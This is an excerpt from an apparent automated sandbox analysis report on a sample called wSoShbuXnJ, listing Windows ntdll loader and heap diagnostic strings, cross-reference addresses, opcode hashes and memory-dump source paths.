                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Strings
                                                              • apphelp.dll, xrefs: 014C6496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01529A2A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01529A01
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01529A11, 01529A3A
                                                              • LdrpInitShimEngine, xrefs: 015299F4, 01529A07, 01529A30
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015299ED
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01542178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01542180
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015421BF
                                                              • SXS: %s() passed the empty activation context, xrefs: 01542165
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0154219F
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01542160, 0154219A, 015421BA
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              Strings
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01548170
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0150C6C3
                                                              • LdrpInitializeProcess, xrefs: 0150C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01548181, 015481F5
                                                              • LdrpInitializeImportRedirection, xrefs: 01548177, 015481EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015481E5
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              APIs
                                                                • Part of subcall function 01512DF0: LdrInitializeThunk.NTDLL ref: 01512DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D74
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-3126994380
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01508421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0150855E
                                                              • LdrpInitializeProcess, xrefs: 01508422
                                                              • @, xrefs: 01508591
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 015421DE
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015421D9, 015422B1
                                                              • .Local, xrefs: 015028D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015422B6
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              Strings
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01543437
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01543456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0154342A
                                                              • RtlDeactivateActivationContext, xrefs: 01543425, 01543432, 01543451
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0153106B
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01530FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015310AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01531028
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              Strings
                                                              • apphelp.dll, xrefs: 014F2462
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0153A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0153A9A2
                                                              • LdrpDynamicShimModule, xrefs: 0153A998
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0153A121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 0153A10F
                                                              • LdrpCheckModule, xrefs: 0153A117
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015482E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 015482D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015482DE
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 0158C212
                                                              • @, xrefs: 0158C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0158C1C5
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01554888
                                                              • LdrpCheckRedirection, xrefs: 0155488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01554899
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01552104
                                                              • LdrpInitializationFailure, xrefs: 015520FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 015520F3
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 014DAA13
                                                              • LdrResSearchResource Exit, xrefs: 014DAA25
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Strings
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              Strings
                                                              • kLsE, xrefs: 014D0540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014D063D
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 014DA309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 014DA2FB
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0155895E
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 9610e7b580104c0be27ff4263609ca9515e4585821dddc48c415af558f0c8448
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 8FB127317006469FDB11DBA8C854BBEBBF6BF84300F28415AE5629B391D770ED41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc6ed926fcd53b6c6a78cd486d4eca1c3dfc61ca7e04457690e96b50c91f91b3
                                                              • Instruction ID: 20005f5700a9fcf7360c58d5e6e76e489d6bc5730621c152f73bf901f78e7491
                                                              • Opcode Fuzzy Hash: dc6ed926fcd53b6c6a78cd486d4eca1c3dfc61ca7e04457690e96b50c91f91b3
                                                              • Instruction Fuzzy Hash: 28C14B741083418FD764CF19C494BABBBE5BF98304F44496EE9898B3A1D774E909CF62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45e6e715917011107d81e45f558f9d336acd85e0e2c6b095c117d26933495d11
                                                              • Instruction ID: cc45cdd810e0ca5944140b943a9388eed52cdb72c05bd1b3a214dbfce9bf95b0
                                                              • Opcode Fuzzy Hash: 45e6e715917011107d81e45f558f9d336acd85e0e2c6b095c117d26933495d11
                                                              • Instruction Fuzzy Hash: 29B18374A002668BDB65CF59C990BADB3B1FF54700F0485EED50EEB291EB349D86CB24
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc4fa4351d48be25682fe31b92aba2534b9f4ba980d48cbb358b4789f0a715ef
                                                              • Instruction ID: ca69ddcfb6e288654dab554e8ae78c8c6c2cefb0076f3056f623ccd9b397ce40
                                                              • Opcode Fuzzy Hash: dc4fa4351d48be25682fe31b92aba2534b9f4ba980d48cbb358b4789f0a715ef
                                                              • Instruction Fuzzy Hash: 32A1F871E046599FEB22DB98C844BAE7BA4BB40714F06012BEB10BF3A1D7749D41CB92
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87b45c050dbdc370b3862dae3c697e240fbdc03568a514406f29e2a6bfc8d715
                                                              • Instruction ID: 74cd5ecd82d8a67ac2ca45c94d59c19f94744995a30f52431ab67f5e78ae02ca
                                                              • Opcode Fuzzy Hash: 87b45c050dbdc370b3862dae3c697e240fbdc03568a514406f29e2a6bfc8d715
                                                              • Instruction Fuzzy Hash: 8AA1E170B006169FEB26CF69C491BAEB7F1FF58318F104029EA159F289DB74E851CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 488224c68424952fcfbf6c13ae43b1b34eb8619ee2344523b59baf01f390de5e
                                                              • Instruction ID: 02795a3a907bc055f9e2d887fb2da248ff825ff35e86ab1b1c7fe943a59fcd79
                                                              • Opcode Fuzzy Hash: 488224c68424952fcfbf6c13ae43b1b34eb8619ee2344523b59baf01f390de5e
                                                              • Instruction Fuzzy Hash: 99A1CD72A40652DFC722DF58C980B2EBBE9FF58704F89092DE5859F661C3B0E901CB91
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                              • Instruction ID: 4c20b3d5e6128f3a5396394bd1fb8a5cb0c0ec10ca59fcceb075c7e654af273f
                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                              • Instruction Fuzzy Hash: A2B14871E4061ADFDF29CFA9C881AADBBF5FF48310F54812AE914AB351D730A941CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d52c989b48f1365fa106c5be82e1d6d6aa02dcb1d487aaf98d94161a77a64862
                                                              • Instruction ID: 1a768241530894e887b1337e697991599a4dcc08b126b71465f75128cd11fde6
                                                              • Opcode Fuzzy Hash: d52c989b48f1365fa106c5be82e1d6d6aa02dcb1d487aaf98d94161a77a64862
                                                              • Instruction Fuzzy Hash: 2191D371D00256AFDB51CFA9D8A0BBEBBB5BF48710F55405AEA00AF351D734E9008BA0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32c1458cae66cc231cc74dda2d69b63235d89cad01efc79151d143275c2f4f4a
                                                              • Instruction ID: 31fd42b21e8f851f48e7e0ec059f030097cdf4a03f8a6c55dd83f1b73240268d
                                                              • Opcode Fuzzy Hash: 32c1458cae66cc231cc74dda2d69b63235d89cad01efc79151d143275c2f4f4a
                                                              • Instruction Fuzzy Hash: 0C915572A00616CFEB24DB99C448B7EBBE1FF94716F05416AE905AF3A0E774D902C750
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1db0299b6ee77cbd51d283202acb67b0d53315b9b525c746bc67d7af8bfb0bd6
                                                              • Instruction ID: 73ad745f8965df0ceea7c9b345ba2f945126fea3e3845b536b2237faa5547c65
                                                              • Opcode Fuzzy Hash: 1db0299b6ee77cbd51d283202acb67b0d53315b9b525c746bc67d7af8bfb0bd6
                                                              • Instruction Fuzzy Hash: 8281A872E0062A9FDB14CF69C540ABEBBF5FB49700F14452EE845EB680E334D940CB94
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction ID: e43befd4090ff83689a1ff04ec05f8c4b0b71afa6be6e35ec827400b946e9815
                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction Fuzzy Hash: 4A818172A0025A9FDF19CF99C480AAEBBF6FF84310F188569E9169F385D734E901CB51
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2848ca239ae28f30e1b94aaadd2d671c96856a192a96058100804b421d2225ec
                                                              • Instruction ID: d7da9b6bfb26cc8689fb7b4fb5c925cd641905c213258da972b299c2db8ebd12
                                                              • Opcode Fuzzy Hash: 2848ca239ae28f30e1b94aaadd2d671c96856a192a96058100804b421d2225ec
                                                              • Instruction Fuzzy Hash: 76814471900609EFDB26CFA9C881BDEBBF9FF88354F144829E555AB250D770AC45CB60
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c246427ed0e9971b5b3197b475a2f61d184439ba14d3afe3b8dae6fc0741e3d8
                                                              • Instruction ID: 3571d435118ce68f3575c1ab36335a9157379e44d59f7a9f314289b817864103
                                                              • Opcode Fuzzy Hash: c246427ed0e9971b5b3197b475a2f61d184439ba14d3afe3b8dae6fc0741e3d8
                                                              • Instruction Fuzzy Hash: 5B71CE75D006669FCB2A8F59C4947FEBBF0FF98710F15461AE952AB360D3309805CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edc83eaabe10795926761125bfd55c7426bbfe5062a3028b85f6aab6250d8bc1
                                                              • Instruction ID: 70622716ef5f362944d9668fa783d6f4f1eacd98c60413c8ac211c7d0ab218a2
                                                              • Opcode Fuzzy Hash: edc83eaabe10795926761125bfd55c7426bbfe5062a3028b85f6aab6250d8bc1
                                                              • Instruction Fuzzy Hash: 9C718E70900606EFDB20EF99D944A9EFBF9FF94700F12815AEA10AF358D7B18A44DB54
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 593585837946b2297e8b43e1fb8054b11174ef3b8b3febefbab6eb6b5e8b8ad0
                                                              • Instruction ID: 5a497a56421d589139e95d3e15eb0593248d798949a39e6e71ef3e4f614d2754
                                                              • Opcode Fuzzy Hash: 593585837946b2297e8b43e1fb8054b11174ef3b8b3febefbab6eb6b5e8b8ad0
                                                              • Instruction Fuzzy Hash: 4D7103756042429FD312DF28C484F2AB7E9FF84311F0485AAE898CB361DBB4DC46CB91
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 6794164196d9ef4428f75d063c10133614df2c35cf4b6046d90fd55c1a9b5f90
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: 7171727190061AEFDB11DFA9C994EDEBBF8FF94704F10456AE905AB290DB30EA41CB50
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 508f49babace33c7d5c883c68c34f5c83a2bc8aa7d4afe1b104627c6544489d8
                                                              • Instruction ID: 45515acbc952ce140d908a897e6e4549ac31d14e1a3b8366e797ed724a359166
                                                              • Opcode Fuzzy Hash: 508f49babace33c7d5c883c68c34f5c83a2bc8aa7d4afe1b104627c6544489d8
                                                              • Instruction Fuzzy Hash: 4C71D532200702AFE732DF18C894F5ABBEAFF44761F154918E6568F2A1D775E944CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54a5fa8fc0832adca0ed4af89843f986a1c37c36abd4bd64624d840bd5843cc4
                                                              • Instruction ID: a1ecce2a13ffa4e83f6f97ea818eda0e776feaacac4fc1de93f984e21c2748dc
                                                              • Opcode Fuzzy Hash: 54a5fa8fc0832adca0ed4af89843f986a1c37c36abd4bd64624d840bd5843cc4
                                                              • Instruction Fuzzy Hash: 9E712D71E4020ABFEB16DF94CC41FEEBBB8FB04351F504559E610AB290D774AA05CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4c7565c4df7d8e88d1b4497a6c968974a78724952ba3ffc7f26905575fbdf41
                                                              • Instruction ID: 46b559e7839b51bf6b8671ec02c66b32a5efeef090680614fdeefe10f424c44a
                                                              • Opcode Fuzzy Hash: b4c7565c4df7d8e88d1b4497a6c968974a78724952ba3ffc7f26905575fbdf41
                                                              • Instruction Fuzzy Hash: D551A172505712AFDB12EE68C844E5BBBE8FBC5750F01492ABA40EF160E770ED05C7A2
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 437004e753d2e86e7fdd8d61da680c3bcb824e8108354af4be5db493257f88e4
                                                              • Instruction ID: 02eb0d68cc2624b7157ad0d6cb54da655d830e701a26b19980e91d339d8cb6b2
                                                              • Opcode Fuzzy Hash: 437004e753d2e86e7fdd8d61da680c3bcb824e8108354af4be5db493257f88e4
                                                              • Instruction Fuzzy Hash: CF51C170900706DFD721CF6AD889A6BFBF9BF94714F104A1ED2925B6A0C7B0A545CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
